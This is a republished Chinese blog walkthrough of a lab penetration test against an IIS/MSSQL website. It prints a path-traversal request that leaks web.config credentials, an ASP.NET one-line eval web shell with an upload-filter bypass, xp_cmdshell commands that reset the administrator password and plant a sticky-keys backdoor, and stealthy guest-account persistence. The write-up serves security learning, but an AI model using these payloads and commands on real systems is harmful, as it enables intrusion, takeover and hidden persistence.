碼上歡樂
相關內容    簡體    繁體

網站從滲透到mssql提權全過程

本文轉載自   查看原文   2020-01-10 00:58   908    挖洞/ 攻防實驗/ 滲透基礎

目錄

  • 信息收集-端口探測
  • 目錄掃描
  • 連接數據庫
  • 文件上傳
  • 一句話Getshell
  • 權限提升
  • 權限維持

 【目標網站172.16.12.103】

滲透全過程

1.信息收集-端口探測

1)Nmap端口探測:namp -sS -p 1-65535 172.16.12.103

可以看到端口開放情況

 

 2.判斷系統情況

根據端口情況初步判定為IIS+mssql+.net系統,訪問web站點URL應該為:http:172.16.12.103:27689

訪問網站出現登入框

 

這里想到直接使用admin爆破一波,但是沒爆破出來,估計密碼復雜,於是只有另辟蹊徑

 

3.網站目錄掃描

御劍、burpsuite進行目錄掃描,burpsuite的掃描類似爆破套路,這里直接使用御劍掃描

 

只有兩個目錄可以訪問,其它需要登入驗證后授權。

1)訪問/robots,txt目錄出現下面幾個目錄,都需要登入,其中/admin/file_down.aspx報錯。

 

2)訪問/admin/file_down.aspx目錄報錯信息如下

看到源文件路徑,訪問參數為file,聯想到是否存在mssql根目錄下的web.config文件

 

4.通過file參數訪問web.config文件尋找可用數據

http://172.16.12.103:27689/admin/file_down.aspx?File=../../web.config(注意:這里上級目錄為/admin,再跳一次就為根目錄了)

 

直接可以下載web.config文件,打開XML文件查看直接看到數據庫賬號/密碼:down/downsql

 

 

5.連接數據庫

使用工具navicat連接數據庫,嘗試查找數據庫中web的賬號密碼

1)連接數據庫

 

2)可視化管理軟件,直接查表,就不用sql語句查詢,查看一個UserLists表,查看得到admin密碼為adfasdfsadfef

 

 

6.使用admin賬號登入web登錄框

 

7.找到上傳點,上傳木馬

部署在IIS上的為asp.net,直接上傳asp.net的一句話:

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>

頭添加GIF89a識別文件頭為GIF,避免內容檢測不通過

 

1)第一次上傳解析不成功

修改后綴為aspx無法上傳,大小寫、雙寫等繞不過(各種嘗試),只能上傳.aspx.jpg形式的

 

上傳a.aspx.jpg文件成功,但是無法解析為aspx文件

 

2)查看”管理文件上傳”,提示文件名達到32位字符會被截取作為文件名,觀察例子,當文件名字符為13位后都被截取,那么想到可以截掉.jpg部分就可以識別為aspx

 

上傳文件為aaaaaaaa.aspx.jpg的一句話成功截斷為aspx

 

3)找上傳路徑,判斷是否解析成功,burp中未找到,源碼沒有,”管理上傳文件”中查文件找到一個報錯信息看到路徑為/upfile/affix/

 

訪問文件,解析成功

 

8.使用菜刀連接getshell

1)配置菜刀

 

2)連接數據庫成功

 

3)通過虛擬終端查看權限

 

Whoami查看明顯權限不夠

 

9.mssql提升權限

基本思路就是新建用戶添加到administrator,開啟3389,最后遠程連接服務器。

使用xp_cmdshell嘗試提權,使用編輯器新建用戶加入adminnistrator失敗,提示無權限進行創建賬號

 

第一種提權:提升net.exe或者net1.exe的權限,然后新建用戶

1)提升net.exe的權限

命令:exec xp_cmdshell 'echo y|cacls net.exe /g system:f'

 

2)重置administrator賬號密碼

命令:exec xp_cmdshell 'net user administrator gooann'

3)開啟遠程3389,直接使用administrator賬號遠程到服務器。

第二種提權方法:

1)使用xp_cmdshell命令,sethc復制cmd.exe,形成shif后門,可以遠程到機器后進行利用;這里相當於我按住5次shif就粘貼cmd.exe了,可以在遠程服務器界面使用。

命令:exec xp_cmdshell 'attrib -s -r -h sethc.exe && copy cmd.exe

 

2)上傳開啟3389遠程的3389.bat,在虛擬終端中執行

 

3)遠程到目的服務器,利用shift后門

 

按住5shift后將出現cmd就會粘貼到桌面

 

4)Whoami查看一下權限為system權限,接下來想辦法能進入圖形化界面

 

4)進入圖形化界面

直接在cmd中輸入:explorer.exe進入windows可視化界面,也就是進入桌面

 

10.權限維持幾種方法

1)圖形化界面直接修改賬號密碼;

2)新建一個用戶;

3)修改注冊表,將administrator賬號的注冊表信息復制到禁用的guest賬號,這時候禁用的guset賬號還是可以使用,這種方法就很隱蔽了。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 【提權過程】嘉緣網站--提權,代理,內網滲透(針對445端口) 黑客講述滲透Hacking Team全過程(詳細解說) MSSQL 漏洞利用與提權 通過Mssql提權的幾種姿勢 Linux下-LNMP環境搭建博客網站(全過程) 感冒全過程 內網滲透 - 提權 - Windows 菜刀滲透提權小結 sql注入->提權->滲透 FileZilla提權的過程
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM